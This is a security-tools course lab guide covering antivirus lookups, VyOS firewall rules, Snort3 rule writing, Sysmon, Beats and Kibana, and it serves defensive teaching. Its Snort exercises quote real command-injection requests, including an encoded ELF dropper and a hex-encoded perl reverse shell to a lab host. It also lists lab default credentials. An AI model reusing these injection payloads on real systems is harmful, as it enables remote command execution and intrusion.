# Security Tools

## Lab 0: Antivirus 
The purpose of this lab is to explore Antivirus capabilties. We will be using an online tool called `VirusTotal` to examine the properties of malware. 

### Virus Total:
VirusTotal was founded in 2004 as a free service that analyzes files and URLs for viruses, worms, trojans and other kinds of malicious content. Our goal is to make the internet a safer place through collaboration between members of the antivirus industry, researchers and end users of all kinds. Fortune 500 companies, governments and leading security companies are all part of the VirusTotal community, which has grown to over 500,000 registered users. Checkout the VirusTotal support docs for more information on [how it works](https://support.virustotal.com/hc/en-us/articles/115002126889-How-it-works).

### Example 1
Let's look at some malware associated with various advanced persistent threat (APT) groups. In this example you will use the SHA256 hash to look up malware that has been uploaded to VirusTotal. For each sample answer the following questions:
1. How many AV detect this malware?
2. What type of file is this?
3. What operating systems is this file targeting?
4. What do you think the malware does? Why?
5. What indicators of compromise (IOCs) could a defender use to find this malware on their systems?
6. Who is the malware attributed?

- 00bd90d8deae6ed682e7967e528dcf43d84937fb67a829d72cb67adb908e48b9
- bd8cda80aaee3e4a17e9967a1c062ac5c8e4aefd7eaa3362f54044c2c94db52a
- 5ff121c57e4a2f2f75e4985660c9666a44b39ef2549b29b3a4d6a1e06e6e3f65
- 5d8a2547598c2a5374b6b54464ce6eeff883e6a25a022c26aeeca4ecb93bc844
- 8ec04c2ccbedb46532ab458f572afbc8d68f30905db9fbbf1c979e9504dc40a9

#### Critical Thinking Question
Defenders have to consider tradeoffs between using online resources versus internal resources for malware analysis. What do you think these tradeoffs are? What advantages and disadvantages are there for using online tools?

### Example 2
You've found a suspicious file on a system (`b.exe`) and you want to get more information about it. Upload this file to VirusTotal to get more information. Answer the following questions:

1. How many AV detect this malware?
2. What type of file is this?
3. What operating systems is this file targeting?
4. What do you think the malware does? Why?
5. What indicators of compromise (IOCs) could a defender use to find this malware on their systems?
 
 Download [b.exe](https://gitlab.com/cyber-irt/irt-security-tools-student/-/blob/main/Resources/b.exe)

## Lab 1: Firewalls 
The purpose of this lab is to introduce you to a basic stateful firewall. We will be using the vyos router as both a router and firewall in your lab network. The firewall supports the creation of groups for ports, addresses, and networks (implemented using netfilter ipset) and the option of interface or zone based firewall policy.

Refer to the [vyos firewall](https://docs.vyos.io/en/equuleus/configuration/firewall/index.html) documentation for more infomation.

In order to change the settings of the vyos router, you will need to be in configuration mode. See [quick start](https://docs.vyos.io/en/equuleus/quick-start.html) for more details.
```
vyos@vyos$ configure
vyos@vyos#
```
Once you've made changes to the settings of the router, you must `commit` and `save` them. For example if I want to diable ping replys on an interface of the firewall I would use the following commands:

```
vyos@vyos:~$ config
vyos@vyos:~# set firewall all-ping disable
vyos@vyos:~# commit
vyos@vyos:~# save
```
To get out of configuration mode use the `exit` command.

```
vyos@vyos:~# exit
vyos@vyos:~$
```
Once you've made configuation changes, it is also helpful to show the vyos configurations by using the `show` command.

```
vyos@vyos:~$ show config
```

### Example 1:
Let's get familiar with the current router and firewall configurations. Refer to the diagram in README.md to a visual.

`vyos@vyos:~$ show config`

Answer the following questions. Refer to the [vyos firewall documentation](https://docs.vyos.io/en/equuleus/configuration/firewall/index.html) for help.
1. The firewall section has several rule-sets. What are these rulesets doing?
2. What does `default-action` do? When does it apply?
3. What are zone policies? How do they differ from firewall rulesets? How do they interact with firewall rulesets in the configuration?

### Example 2:
Weird activity has been happening on the OPS network. Systems have been reaching out to weird ports on the internet. Write firewall rules to drop traffic that is not web traffic originating from OPS. Consider what ports and states are acceptable for web browsing. The [vyos zone policy basics page](https://docs.vyos.io/en/equuleus/configuration/zonepolicy/index.html) and [zone policy blueprint page](https://docs.vyos.io/en/equuleus/configexamples/zone-policy.html) may help. 

<!--- Answers Ex. 3
set firewall name ops-wan default-action 'drop'
set firewall name ops-wan rule 1 action 'accept'
set firewall name ops-wan rule 1 state established 'enable'
set firewall name ops-wan rule 1 state related 'enable'
set firewall name ops-wan rule 2 action 'drop'
set firewall name ops-wan rule 2 state invalid 'enable'
set firewall name ops-wan rule 2 log enable
#rule 200 - Web

set firewall name ops-wan rule 200 action 'accept'
set firewall name ops-wan rule 200 destination port '443'
set firewall name ops-wan rule 200 protocol 'tcp'

set firewall name ops-wan rule 201 action 'accept'
set firewall name ops-wan rule 201 destination port '80'
set firewall name ops-wan rule 201 protocol 'tcp'

#rule 600 - DNS
set firewall name ops-wan rule 600 action 'accept'
set firewall name ops-wan rule 600 destination port '53'
set firewall name ops-wan rule 600 protocol 'udp'

#rule 400 - RDP
set firewall name ops-wan rule 600 action 'accept'
set firewall name ops-wan rule 600 destination port '3389'
set firewall name ops-wan rule 600 protocol 'tcp'

#set zone-policy zone wan from ops firewall name 'ops-wan'

set firewall name wan-ops default-action 'drop'
set firewall name wan-ops rule 1 action 'accept'
set firewall name wan-ops rule 1 state established 'enable'
set firewall name wan-ops rule 1 state related 'enable'
set firewall name wan-ops rule 2 action 'drop'
set firewall name wan-ops rule 2 state invalid 'enable'
set firewall name wan-ops rule 2 log enable
#set zone-policy zone ops from wan firewall name 'wan-ops'
-->

## Example 3
You would like to get some statistics about your SIEM (Elastic) directly from your administration box (Kali Host). Add a port forwarding rule to allow for curl to 10.61.XXX.5 on port 9200. To test if you have set up this rule correctly, you can run the following command
```
curl --user elastic:elastic -XGET "http://[RANGE-IP]:9200"
```
If you have done this correctly, you will see output similar to this:
```
{
  "name" : "9793cff33352",
  "cluster_name" : "docker-cluster",
  "cluster_uuid" : "xxHsBfgpTgCgx3Y1_P5qhA",
  "version" : {
    "number" : "7.16.3",
    "build_flavor" : "default",
    "build_type" : "docker",
    "build_hash" : "4e6e4eab2297e949ec994e688dad46290d018022",
    "build_date" : "2022-01-06T23:43:02.825887787Z",
    "build_snapshot" : false,
    "lucene_version" : "8.10.1",
    "minimum_wire_compatibility_version" : "6.8.0",
    "minimum_index_compatibility_version" : "6.0.0-beta1"
  },
  "tagline" : "You Know, for Search"
}
```

<!---
set nat destination rule 207 description "Forward to elastic instance"
set nat destination rule 207 destination port 9200
set nat destination rule 207 inbound-interface eth2
set nat destination rule 207 protocol tcp
set nat destination rule 207 translation address [DCO BOX]
-->

## Lab 2: SNORT3
The purpose of this lab is to introduce you to signature based intrusion detection/protection systems. Snort is a widely used IDS/IPS that is opensource and very powerful. We will explore different types of threats you can detect using signatures, but this is not an all inclusive course. The functionality of snort is much wider than what we will cover. For futher information about snort3, checkout the github: https://github.com/snort3/snort3

### Setup for Exercise 1-3

First ensure that the snort3 docker container exist on your machine by opening a terminal and typing

`$ docker container ls`

```bash
CONTAINER ID   IMAGE               COMMAND                  CREATED          STATUS          PORTS     NAMES
4432cb2f1d23   ciscotalos/snort3   "/bin/sh -c /bin/bas…"   46 seconds ago   Up 45 seconds             snort3
```

If you **do not** see the running snort3 container skip this step. If you **do** see the running snort3 container, enter the shell by typing the below command and then move on to the **Signature Review** section.

`$ docker exec -it snort3 /bin/bash`  (Only do this step if your container is already running)

```
snorty@snort3:~$ 
```

If you **do not** see the running snort3 container you will need to validate that the snort3 image is downloaded and then start it. First list images by typing

`$ sudo docker images`

 ```bash
REPOSITORY                  TAG       IMAGE ID       CREATED         SIZE
snort3-docker               latest    8eb40bad2be8   2 days ago      777MB
 ```

If you **do not** see the running snort3 container you can start it by typing:

`$ sudo docker run -it snort3-docker /bin/bash`

This will drop you into a snort docker container.
```
snorty@f7c59d0d65e4:~$
```

### Signature Review
Rules tell Snort how to detect interesting conditions, such as an attack, and what to do when the condition is detected. Here is an example rule:

`alert tcp any any -> 192.168.1.1 80 ( msg:"A ha!"; content:"attack"; sid:1; )`

The structure is:
action proto source dir dest ( body )

Where:
- `action` - tells Snort what to do when a rule "fires", ie when the signature matches. In this case Snort will log the event. It can also do something like block the flow when running inline.
- `proto` - tells Snort what protocol applies. This may be ip, icmp, tcp, udp, http, etc.
- `source` - specifies the sending IP address and port, either of which can be the keyword any, which is a wildcard.
- `dir` - must be either unidirectional `<` or `>` as above or bidirectional indicated by `<>`.
- `dest` - similar to source but indicates the receiving end.
- `body` - detection and other information contained in parenthesis.

There are many rule options available to construct as sophisticated a signature as needed. In this case we are simply looking for the "attack" in any TCP packet. A better rule might look like this:

```
alert http
(
    msg:"Gotcha!";
    flow:established, to_server;
    http_uri:"attack";
    sid:2;
)
```

Note that these examples have a sid option, which indicates the signature ID. In general rules are specified by gid:sid:rev notation, where gid is the generator ID and rev is the revision of the rule. By default, text rules are gid 1 and shared-object (SO) rules are gid 3. The various components within Snort that generate events have 1XX gids, for example the decoder is gid 116. You can list the internal gids and sids with these commands:

```
$ snort --list-gids
$ snort --list-builtin
```

### Exercise 1
Let's try writing a rule.

`$ cd ~/examples/rulewriting/lab1`

and open local.rules in a text editor vim

`$ vim local.rules`

> **VIM primer** \
> `i` to insert/edit text and `ESC` key to exit insert mode \
> `ESC` + `:` + `w` to save your edits \
> `ESC` + `:` + `q` to exit the vim editor \
> `ESC` + `:wq` to save and exit at the same time \
> `ESC` + `:q!` to exit without saving your edits
> VIM Cheatsheet: [https://vimsheet.com/](https://vimsheet.com/)

We have the outline of a rule that will be used to detect command injection. However, we don't have the "detection" piece implemented yet.

```
alert http (
        msg:"SERVER-WEBAPP Trend Micro SPS command injection attempt";
        flow:to_server,established;
        reference:cve,2016-6267;
        classtype:web-application-attack;
        sid:1;
 )
```
In our `lab1.pcap` we have some very curious behavior. Take a look at it in wireshark and then continue below.

```
POST /php/admin_notification.php HTTP/1.0
Host: 192.168.81.138
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Referer: https://192.168.81.138:80/login.php
Origin: https://192.168.81.138:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 1141

EnableSNMP=on&Community=hello&submit=Save&pubkey=&spare_EnableSNMP=1&spare_Community=test%3becho%20-n%20f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAi2AAAAGAEAAAcAAAAAEAAA29i%2bnRRyrdl0JPRYMcmxEjFwGoPo/ANwFuJoJalacRUO9h%2bYIJ5WfY3f/yVmIFeId8ilK2lUIMrjAmpdpZ0DvAbvk42OVpPhkKga4....
```

Someone is trying to send a `POST` request to `admin_notification.php` but there is some weird data in the variable `spare_Community`.
***spare_Community=test%3becho%20-n%20f0VMRgEBAQAAAAAAAAAAAAI...***

Below is a snippet of the vulnerable code in admin_notification.php that processes the `spare_Community` variable.
```
$arr1['SNMP']['Community'] = $_POST['spare_Community'];
$ret - SnmpUtils:SetCommunintyName($arr1['SNMP']['Community']);

static function SetCommunityName($CommunityName){
    $command = "/bin/ServWebExec --snmpsetcomm".$CommunityName;
    system($command, $retval);
}
```

We see that arbitarty data can be input into the `spare_Community` variable and will be appeneded and executed in the `command` variable. In this case `test%3b` translates into `test;` which ends the command and allows another command starting with `echo -n` to execute.  Bad juju. We need to write a rule to catch such behavior. What we want to catch are shell metacharacters. Shell metacharacters includes chars like `; | <> $ () `. Snort allows you to use pearl regular expressions (PCRE) to match sequences of characters. In this examples we will use  `/(^|&)spare_Community=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)/i";` to look for the variable `spare_Community` followed by any number of the shell metacharacters.

Since there will be a ton of traffic snort will be looking at -- we will want to focus on traffic that specifically affects this vulnerable application. How do we identify the vulnerable application? Let's match the http uri to specify which part of the packet we want to look at.

```
http_uri:path;
content:"/admin_notification.php",nocase;
```

The above will filter specifically for packets that `/admin_notification.php` in the http_uri path. But what more do we need? This could catch legitimate traffic going to `/admin_notification.php`. Let's focus on the http body.

```txt
http_client_body;
content:"spare_Community=",nocase;
pcre:"/(^|&)spare_Community=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)/i";
```

Putting it all together we will rewrite our rule as shown below:

```txt
alert http (
	msg:"SERVER-WEBAPP Trend Micro SPS command injection attempt";
	flow:to_server,established;
	http_uri:path;
	content:"/admin_notification.php",nocase;
	http_client_body;
	content:"spare_Community=",nocase;
	pcre:"/(^|&)spare_Community=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)/i";
	sid:1;
)
```

We can test that this rule works, by executing the following command:
`$ snort -q --talos -R local.rules -r lab1.pcap"

This command is broken down as:

- -q: quiet mode, shows a summary of alerts
- --talos: talos tweaks  
- -R: rule file to include
- -r: pcap file to read

```
snorty@snort3:~/examples/rulewriting/lab1$ snort -q --talos -R local.rules -r lab1.pcap 

##### lab1.pcap #####
	[1:1:0] SERVER-WEBAPP Trend Micro SPS command injection attempt (alerts: 4)
#####
--------------------------------------------------
rule profile (all, sorted by total_time)
#       gid   sid rev    checks matches alerts time (us) avg/check avg/match avg/non-match timeouts suspends
=       ===   === ===    ====== ======= ====== ========= ========= ========= ============= ======== ========
1         1     1   0         6       6      4         5         0         0             0        0        0
```
Yay! It works!

### Exercise 2
Let's checkout another example.
```
$ cd ~/examples/rulewriting/lab3
$ mv local.rules local.rules.bak
```

Open up the lab3.pcap file in wireshark and take a look, then continue below.

Yikes, more bad stuff. We have yet another command injection issue, but this time it's in the http_uri. We know from the previous example that we an detect command injection by looking for shell metacharacters.

```
GET /common/download_agent_installer.php?version=8.0.152&orgid=1%23%3b%20perl%20-e%20system\%28pack\%28qq%2cH464%2c%2cqq%2c7065726c202d4d494f202d65202724703d666f726b3b657869742c6966282470293b666f7265616368206d7920246b6579286b6579732025454e56297b69662824454e567b246b65797d3d7e2f282e2a292f297b24454e567b246b65797d3d24313b7d7d24633d6e657720494f3a3a536f636b65743a3a494e45542850656572416464722c223137322e31362e31302e3130323a3434343422293b535444494e2d3e66646f70656e2824632c72293b247e2d3e66646f70656e2824632c77293b7768696c65283c3e297b696628245f3d7e202f282e2a292f297b73797374656d2024313b7d7d3b27%2c\%29\%29%20&platform=windows&serv=4118c718c400855816a81010fe58a0fb026b3b1bb3246dfafca085df4ad28cfa HTTP/1.1
Host: 172.16.10.120
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
```

The vulnerable code looks like this:

```
$org_id = $_GET['orgid'];
$agent_version = $_get['version'];
$templocation = "/tmp/agentprov/".$org_id."/".$agent_version."/";
exec('/bin/cp '.$dir.'*.msi '.$dir. '*.bat '.$templocation);
```
Here we see both `orgid` and `version` are unvalidated user input that get concatendated into a string to be executed. Make a file called `yourname.rules` in `~/examples/rulewriting/lab3` (`touch yourname.rules`). In your file, write a rule to catch this behavior. Below is a template to get you started and https://regex101.com/ may be useful to generate a pcre regex along with https://docs.snort.org/rules/options/payload/http/ to identify the http keyword options.

```
alert http (
	msg:"SERVER-WEBAPP Quest KACE System Management Appliance download_agent_installer.php command injection attempt";
	flow:to_server,established;
	http_uri:path;
	content:[WHAT PATH HAS THE VULNERABILITY?]
	http_uri:query;
	pcre:[SOME REGULAR EXPRESSION THAT WILL LOOK FOR "orgid or version" and shell metacharacters]
	sid:1;
)
```

To test your rule:
`$ snort -q --talos -R yourname.rules -r lab3.pcap`

If you have correctly written the rule, you will see output like:
```
##### lab3.pcap #####
	[1:1:0] SERVER-WEBAPP Quest KACE System Management Appliance download_agent_installer.php command injection attempt (alerts: 1)
#####
--------------------------------------------------
rule profile (all, sorted by total_time)
#       gid   sid rev    checks matches alerts time (us) avg/check avg/match avg/non-match timeouts suspends
=       ===   === ===    ====== ======= ====== ========= ========= ========= ============= ======== ========
1         1     1   0         2       1      1        72        36        68             3        0        0
```
Note that local.rules(.bak) has a answer, but try it yourself first.

## Exercise 3
Let's revisit the `b.exe` file discussed in Lab 0. You've identified some IOCs in Lab 0 and we've collected a pcap of activity we think is associated with an earlier version of `b.exe` called `a.exe`.  Using the `suspicious.pcap` from `a.exe` and the IOCs you've identified, make 2 rules to detect network activity associated with this file. You can find the `suspicious.pcap` in the `Resources/snort_lab` folder. This web page may be useful in developing your rules: https://docs.snort.org/rules/options/payload/http/

You can look at `suspicious.pcap` using tcpdump with the following command:
`tcpdump -qns 0 -A -r suspicious.pcap`

After you've crafted your rules in a `suspicious.rules` file run them against the pcap and see if they trigger.

`$ snort -q --talos -R suspicious.rules -r suspicious.pcap`

#### References:
1. Snort3 User Guide: https://snort-org-site.s3.amazonaws.com/production/release_files/files/000/033/387/original/snort_user.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAU7AK5ITMJQBJPARJ%2F20230717%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230717T164008Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=0fc177c554e682fb2bbae2de4dd2230c08daea79eed406e860e4413a0fa2b3d3#_rules_2
2. Snort 3 Rule Writing Guide: https://docs.snort.org/rules
3. Talos Labs: https://www.youtube.com/watch?v=CystKHV2gnI&ab_channel=CiscoTalosIntelligenceGroup

## Lab 3: Sysmon

Reference: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon

Let's take a look at the sysmonconfig.xml file found in the `Resources\sysmon_lab` folder of this repo and explore sysmon.

1. What lines in the config xml file generate a log on activity related to Tor?
<!-- Line 858 of the config file logs tor.exe traffic and 859-862 identifies possible Tor ports. -->
2. If the Tor.exe binary was to run when this config file is being used, what event ID would show up in the log?
<!-- Event ID 3 == Network Connection - Includes -->
3. Where are the logs for sysmon stored?
<!-- Windows Event Viewer, Applications and Services Logs/Microsoft/Windows/Sysmon/Operational -->

RDP into the windows system using the following command on Kali linux
`xfreerdp /u:Administrator /v:192.168.11.<your_IP>`

4. Is sysmon running as a service?
<!-- Yes, check the Services -->
5. Look at the sysmon logs. How often are they being generated?
<!-- Often -->
6. Is a sysmon configuration file currently being used?
<!-- Not, run `Sysmon64.exe -c` to see if it has a config file -->
7. Apply the `sysmonconfig.xml` file, located on the desktop, to sysmon.
<!-- Run `C:\Program Files\Sysmon64.exe -c C:\Users\Administrator\Desktop\sysmonconfig.xml` -->
> Note: The sysmon64.exe binary is located in C:\Program Files\Sysmon64.exe
8. Look at the sysmon logs. How often are they being generated now?
<!-- Even more often -->
9. Create a new config.xml file and create a rule that will alert if `b.exe` is executed.
10. Run `b.exe` from the desktop and check the event log to see if it was logged. What event ID did your rule generate?
<!-- Event ID 1 Process Creation -->
11. Rename b.exe using the following command `copy b.exe c.exe`. Now run `c.exe`. Does it show up in the sysmon logs?
<!-- Nope -->
12. Modify your config.xml and log all dns requests. Run `ping google.com` and identify the event ID that was generated in the sysmon log.

Questions to ponder:
- If it is so easy to bypass a sysmon rule then why do we use it?
- Why are there so many excludes in the `sysmonconfig.xml` file?

## Lab 4: Beats

As taught in the previous lessons, this lab will familiarize the student with the data sources that the operating system and intrusion detection system tools generate. The slides in this course introduced you to beats, their inputs, configuration files, and outputs so you can better analyze these existing data sources. Prior to jumping into the specific tools, let’s take a look at the data sources in their raw form.

Remote desktop to the Windows Virtual Machine via your computer’s RDP client. `xfreerdp /u:Administrator /v:192.168.11.X`. The credentials are `Username: Administrator; Password: Administrator`

Let's generate some logs prior to looking at them manually. `Navigate to APTSimulator folder on the Desktop and execute the batch script (.bat)`. It will continue to run in the background.

Once the desktop is loaded, search for `Event Viewer` in the Windows search bar. Manually navigate to the various event logs under the Windows Logs folder such as `Security, Application, System, etc.` These are all logs generated by the Windows operating system natively. You recently also learned about Sysmon and it’s powerful logging capabilities. `Sysmon logs can be found under Applications and Services\Microsoft\Windows\Sysmon\Operational`. Open this path and view these logs. As you have probably noticed, this is manually intensive and time consuming. This is where beats comes into play!

## Exercise 1
Beats is an application provided by Elastic to help ship logs to Elasticsearch. In this lab, the Windows virtual machine is running winlogbeats and packetbeat. We are going to explore the configuration file for winlogbeats to see how it is configured:

Navigate to the winlogbeat folder under: `C:\Windows\Monitor\winlogbeat`. Open the configuration file `winlogbeat.yml` with notepad and inspect the configuration. After inspection, can you identify which logs winlogbeats is configured to ship?

Beats can be configured to send logs to a variety of different outputs. Can you tell where winlogbeat configured to ship the logs to?

As you have identified where winlogbeats is shipping logs, you may have noticed that each log has a javascript file referenced with it. Can you identify what these scripts are doing to the logs? 


## Exercise 2

Filebeats is another popular type of beats that is typically used on *nix operating systems. It has the same functionality as winlogbeats and is configured to ship logs of our choosing to either elasticsearch or logstash. In this lab, you will explore the filebeats configuration file and see how it ships the previously discussed Snort alerts. 

SSH into the Ubuntu virtual machine using your SSH client. `The IP address is `192.168.11.10X on port 23 (replace the X with the number assigned to you for this lab)`.

Inspect the filebeat.yml configuration file in the `/etc/filebeat directory`. Which file is filebeat monitoring to ship logs and where is it sending it to?

Lastly, modify the `filebeat.yml` file to be configured to collect and ship logs from `/var/log/auth.log`. Prior to doing this stop the filebeat service with `sudo systemctl stop filebeat.service`. Once changes are complete with the filebeat.yml file, restart the service with sudo systemctl start filebeat.service`. You can check if the service is running by doing `sudo sytemctl status filebeat.service`.

## Lab 5: Kibana

The purpose of this lab is to give you familiarzation with a SIEM. For this lab we will be using the Elastic Logstash Kibana (ELK) Stack to search through data being sent from our Windows 10 machine and Snort3. Below is a diagram for reference on how the different componenets of the ELK Stack work together.

![https://lalit-soni.medium.com/what-is-elk-stack-elasticsearch-logstash-and-kibana-6b26b5b1a79c](elk.png)

### Exercise 1:

As a reminder, Kibana is the visualization and analytics engine for Elasticsearch. Kibana is very powerful and allows you to do a variety of activies such as make customized dashboards and analyitcs. Many log shippers come with pre-built dashboards that help you quickly visualize your data. We will first start with the "Discover" feature of Kibana, to look at raw logs. Go to your Kibana host and login `http://192.168.11.10X:5601`. The username and password are `elastic`. 

Browse to your Kibana page `http://192.168.11.10X:5601` and go to the Analytics->Discover window. Here you will find a search engine that allows you to look through indexed logs in elasticsearch. ![elastic interface](elastic_discover.png)

Take some time to explore the interface. Our Windows logs will be in the `winlogbeat-*` index pattern, our Windows packbeat logs will be in `packetbeat-*`, and our Ubuntu snort alerts and auth.log logs will be under `filebeat-*`. You can  You can choose from different index patterns from the drop down on left hand side if not already selected. To filter specifically for Sysmon logs, use the search bar and type `event.module:"sysmon"` under the `winlogbeat-*` index pattern. Checkout the various fields avaialble in the Sysmon logs.  

From the [Sysmon documentation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon), we know that each event is associated with an event code. Let's see if we can see the new event we added for curl. Run a curl command from your Windows 10 Victim and look for logs in Kibana.
 
 
### Exercise 2: 
Now that we're a bit more familiar with Kibana, let's look at a more complicated example. Open up the APT Simulator folder on the Windows 10 Victim machine. Run APTSimulator.bat file as administrator. When prompted to continue, type "Y" to continue. You will be shown a menu of options to simulate APTs. For more information, checkout the [APTSimulator github](https://github.com/NextronSystems/APTSimulator).

Let's run one of the simulations, "Persistence". After the simulation runs, go to Kibana to review the logs. Filter on Sysmon logs. In the "Selected fields" add "process.command_line". We notice that there is alot of BAAAAAAADD looking traffic. Let's explore some of it.  

Filter for specifically process names that are "powershell.exe". Investigate these commands and answer the following questions:
1. What do these command do?
2. Is it spawning more processes? (Hint -- if you use the proccess's PID and create a filter where parent pid is the pid you identified, you can find children)
3. Do these commands create files? Where?
4. Do these commands change files?
5. Continue the same analytical questions for child procceses.

Having a SIEM is a great tool to do investigative work on networks and hosts as long as you are collecting the correct data. Feel free to test more of the APT simulator options to identify traffic. You may also note that the `packetbeat-*` index logs network traffic for your Windows Victim, so you may find interesting logs there as well.

### Exercise 3:
Now that you have analyzed data within Discover, let's take a look at some of our dashboards. Bring up the Kibana navigational menu by clicking the three bars in the top left corner under Elastic. Under `Analytics` click Dashboard. From there, you can search the pre-built dashboards such as `[Winlogbeat] Overview` or `[Packetbeat] Overview ECS`. 

To create your own dashboards, select the `Create Dashboard` button in the top right of the main dashboard menu. Proceed to click `Create visualizaiton` to create a pie chart that will display our windows event providers. You can choose this by selecting `event.provider` under the search tab on the left side. On the middle panel, scroll down to select `Pie`. You should see a pie chart of the various Windows log sources. Click `Save and Return` in the top right of Kibana. Congratulations you just created your first visualization! 

Try creating your own visualizations. Some example visualizations can be a table of the earlier exercise displaying the Sysmon `process.command_line` data set or a bar graph of the different Event IDs (`winlog.event_id`)
